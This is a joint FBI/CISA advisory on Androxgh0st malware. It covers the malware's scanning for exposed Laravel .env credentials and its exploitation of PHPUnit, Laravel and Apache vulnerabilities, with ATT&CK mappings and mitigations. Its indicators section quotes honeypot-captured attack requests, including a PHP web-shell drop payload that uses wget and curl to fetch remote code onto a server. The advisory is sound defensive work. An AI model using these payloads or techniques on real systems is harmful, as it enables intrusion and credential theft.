The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) to disseminate known indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with threat actors deploying Androxgh0st malware. Multiple, ongoing investigations and trusted third party reporting yielded the IOCs and TTPs, and provided information on Androxgh0st malware’s ability to establish a botnet that can further identify and compromise vulnerable networks.
The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of cybersecurity incidents caused by Androxgh0st infections.
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques with corresponding mitigation and/or detection recommendations. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Androxgh0st malware has been observed establishing a botnet [T1583.005] for victim identification and exploitation in target networks. According to open source reporting, Androxgh0st is a Python-scripted malware [T1059.006] primarily used to target .env files that contain confidential information, such as credentials [T1552.001] for various high profile applications (i.e., Amazon Web Services [AWS], Microsoft Office 365, SendGrid, and Twilio from the Laravel web application framework). Androxgh0st malware also supports numerous functions capable of abusing the Simple Mail Transfer Protocol (SMTP), such as scanning [T1046] and exploiting exposed credentials [T1078] and application programming interfaces (APIs) [T1114], and web shell deployment [T1505.003].
Targeting the PHPUnit
Androxgh0st malware TTPs commonly involves the use of scripts, conducting scanning [T1595] and searching for websites with specific vulnerabilities. In particular, threat actors deploying Androxgh0st have been observed exploiting CVE-2017-9841 to remotely run hypertext preprocessor (PHP) code on fallible websites via PHPUnit [T1190]. Websites using the PHPUnit module that have internet-accessible (exposed)
/vendor folders are subject to malicious
HTTP POST requests to the
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php uniform resource identifier (URI). This PHP page runs PHP code submitted through a POST request, which allows the threat actors to remotely execute code.
Malicious actors likely use Androxgh0st to download malicious files [T1105] to the system hosting the website. Threat actors are further able to set up a fake (illegitimate) page accessible via the URI to provide backdoor access to the website. This allows threat actors to download additional malicious files for their operations and access databases.
Laravel Framework Targeting
Androxgh0st malware establishes a botnet to scan for websites using the Laravel web application framework. After identifying websites using the Laravel web application, threat actors attempt to determine if the domain’s root-level
.env file is exposed and contains credentials for accessing additional services. Note:
.env files commonly store credentials and tokens. Threat actors often target
.env files to steal these credentials within the environment variables.
.env file is exposed, threat actors will issue a GET request to the
/.env URI to attempt to access the data on the page. Alternatively, Androxgh0st may issue a POST request to the same URI with a POST variable named
0x containing certain data sent to the web server. This data is frequently used as an identifier for the threat actor. This method appears to be used for websites in debug mode (i.e., when non-production websites are exposed to the internet). A successful response from either of these methods allows the threat actors to look for usernames, passwords, and/or other credentials pertaining to services such as email (via SMTP) and AWS accounts.
Androxgh0st malware can also access the application key [TA0006] for the Laravel application on the website. If the threat actors successfully identify the Laravel application key, they will attempt exploitation by using the key to encrypt PHP code [T1027.010]. The encrypted code is then passed to the website as a value in the cross-site forgery request (XSRF) token cookie,
XSRF-TOKEN, and included in a future GET request to the website. The vulnerability defined in CVE-2018-15133 indicates that on Laravel applications, XSRF token values are subject to an un-serialized call, which can allow for remote code execution. In doing so, the threat actors can upload files to the website via remote access.
Apache Web Server Targeting
In correlation with CVE-2021-41773, Androxgh0st actors have been observed scanning vulnerable web servers [T1595.002] running Apache HTTP Server versions 2.4.49 or 2.4.50. Threat actors can identify uniform resource locators (URLs) for files outside root directory through a path traversal attack [T1083]. If these files are not protected by the “request all denied” configuration and Common Gateway Interface (CGI) scripts are enabled, this may allow for remote code execution.
If threat actors obtain credentials for any services using the above methods, they may use these credentials to access sensitive data or use these services to conduct additional malicious operations. For example, when threat actors successfully identify and compromise AWS credentials from a vulnerable website, they have been observed attempting to create new users and user policies [T1136]. Additionally, Andoxgh0st actors have been observed creating new AWS instances to use for conducting additional scanning activity [T1583.006].
INDICATORS OF COMPROMISE (IOCs)
Based on investigations and analysis, the following requests are associated with Androxgh0st activity:
- Incoming GET and POST requests to the following URIs:
- Incoming POST requests with the following strings:
In both previously listed POST request strings, the name
androxgh0st has been observed to be replaced with other monikers.
Additional URIs observed by the FBI and a trusted third party used by these threat actors for credential exfiltration include:
- Note: the actor may attempt multiple different potential URI endpoints scanning for the
.envfile, for example
/docker/.env or /local/.env.
- Note: the actor may attempt multiple different potential URI endpoints scanning for the
Targeted URIs for web-shell drop:
An example of attempted credential exfiltration through (honeypot) open proxies:
POST /.aws/credentials HTTP/1.1
user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
accept-encoding: gzip, deflate
An example of attempted web-shell drop through (honeypot) open proxies:
GET http://www.example.com/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/184.108.40.206 Safari/537.36 Edg/116.0.1938.76
accept-encoding: gzip, deflate
<?php file_put_contents(‘evil.php’,file_get_contents(‘hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt’)); system(‘wget hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php;curl hxxps://mc.rockylinux[.]si/seoforce/triggers/files/evil.txt -O evil.php’); ?>
Monikers used instead of Androxgh0st (0x%5B%5D=???):
Example malware drops through eval-stdin.php:
MITRE ATT&CK TACTICS AND TECHNIQUES
See Tables 1-10 for all referenced threat actor tactics and techniques in this advisory.
Active Scanning: Vulnerability Scanning
The threat actor scans websites for specific vulnerabilities to exploit.
Acquire Infrastructure: Botnet
The threat actor establishes a botnet to identify and exploit victims.
Acquire Infrastructure: Web Services
The threat actor creates new AWS instances to use for scanning.
Exploit Public-Facing Application
The threat actor exploits CVE-2017-9841 to remotely run hypertext preprocessor (PHP) code on websites via PHPUnit.
Command and Scripting Interpreter: Python
The threat actor uses Androxgh0st, a Python-scripted malware, to target victim files.
The threat actor abuses the simple mail transfer protocol (SMTP) by exploiting exposed credentials.
Server Software Component: Web Shell
The threat actor deploys web shells to maintain persistent access to systems.
The threat actor attempts to create new users and user policies with compromised AWS credentials from a vulnerable website.
Obfuscated Files or Information: Command Obfuscation
The threat actor can exploit a successfully identified Laravel application key to encrypt PHP code, which is then passed to the site as a value in the XSRF-TOKEN cookie.
The threat actor can access the application key of the Laravel application on the site.
Unsecured Credentials: Credentials in Files
The threat actor targets .env files that contain confidential credential information.
File and Directory Discovery
The threat actor can identify URLs for files outside root directory through a path traversal attack.
Network Service Discovery
The threat actor uses Androxgh0st to abuse simple mail transfer protocol (SMTP) via scanning.
The threat actor interacts with application programming interfaces (APIs) to gather information.
Ingress Tool Transfer
The threat actor runs PHP code through a POST request to download malicious files to the system hosting the website.
The FBI and CISA recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on Androxgh0st threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
These mitigations apply to all critical infrastructure organizations and network defenders. FBI and CISA recommend that software manufacturers incorporate secure by design principles and tactics into their software development practices, limiting the impact of actor techniques and strengthening their customers’ security posture. For more information on secure by design, see CISA’s Secure by Design webpage.
The FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by actors using Androxgh0st malware.
- Keep all operating systems, software, and firmware up to date. Specifically, ensure that Apache servers are not running versions 2.4.49 or 2.4.50. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems.
- Verify that the default configuration for all URIs is to deny all requests unless there is a specific need for it to be accessible.
- Ensure that any live Laravel applications are not in “debug” or testing mode. Remove all cloud credentials from
.envfiles and revoke them. All cloud providers have safer ways to provide temporary, frequently rotated credentials to code running inside a web server without storing them in any file.
- On a one-time basis for previously stored cloud credentials, and on an on-going basis for other types of credentials that cannot be removed, review any platforms or services that have credentials listed in the
.envfile for unauthorized access or use.
- Scan the server’s file system for unrecognized PHP files, particularly in the root directory or
- Review outgoing GET requests (via cURL command) to file hosting sites such as GitHub, pastebin, etc., particularly when the request accesses a
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
- Select an ATT&CK technique described in this advisory (see Tables 1-10).
- Align your security technologies against the technique.
- Test your technologies against the technique.
- Analyze your detection and prevention technologies’ performance.
- Repeat the process for all security technologies to obtain a set of comprehensive performance data.
- Tune your security program, including people, processes, and technologies, based on the data generated by this process.
FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI encourages organizations to report information concerning suspicious or criminal activity to their local FBI field office. With regards to specific information that appears in this CSA, indicators should always be evaluated in light of an organization’s complete security situation.
When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Reports can be submitted to the FBI Internet Crime Complaint Center (IC3), a local FBI Field Office, or to CISA via its Incident Reporting System or its 24/7 Operations Center at [email protected] or (888) 282-0870.
Amazon contributed to this CSA.
The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and CISA.
January 16, 2024: Initial version.